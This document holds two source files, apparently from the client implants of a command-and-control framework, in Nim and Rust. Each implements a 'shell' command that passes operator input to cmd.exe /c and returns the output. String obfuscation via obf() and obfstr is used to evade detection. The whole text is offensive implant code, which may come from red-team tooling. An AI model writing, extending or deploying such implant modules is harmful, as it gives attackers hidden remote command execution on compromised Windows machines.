File: client/commands/risky/shell.nim
import osproc

# Execute a shell command via 'cmd.exe /c' and return output
proc shell*(args : varargs[string]) : string =
    var commandArgs : seq[string]
    
    if args[0] == "":
        result = obf("Invalid number of arguments received. Usage: 'shell [command]'.")
    else:
        commandArgs.add(obf("/c"))
        commandArgs.add(args)
        result = execProcess(obf("cmd"), args=commandArgs, options={poUsePath, poStdErrToStdOut, poDaemon})

File: client-rs/src/app/commands/shell.rs
use fmtools::format; // using obfstr to obfuscate
use std::process::Command;
use std::string::String;

pub(crate) fn shell(command: &str) -> String {
    if command.is_empty() {
        return format!("Invalid number of arguments received. Usage: 'shell [command]'.");
    }

    match Command::new("cmd")
        .args(["/C", command])
        .output()
        {
        Ok(output) => {
            match output.stdout.len() {
                0 => format!("Command executed successfully."),
                _ => String::from_utf8_lossy(&output.stdout).to_string()
            }
        },
        Err(e) => format!("Failed to execute command: "{e}),
    }
}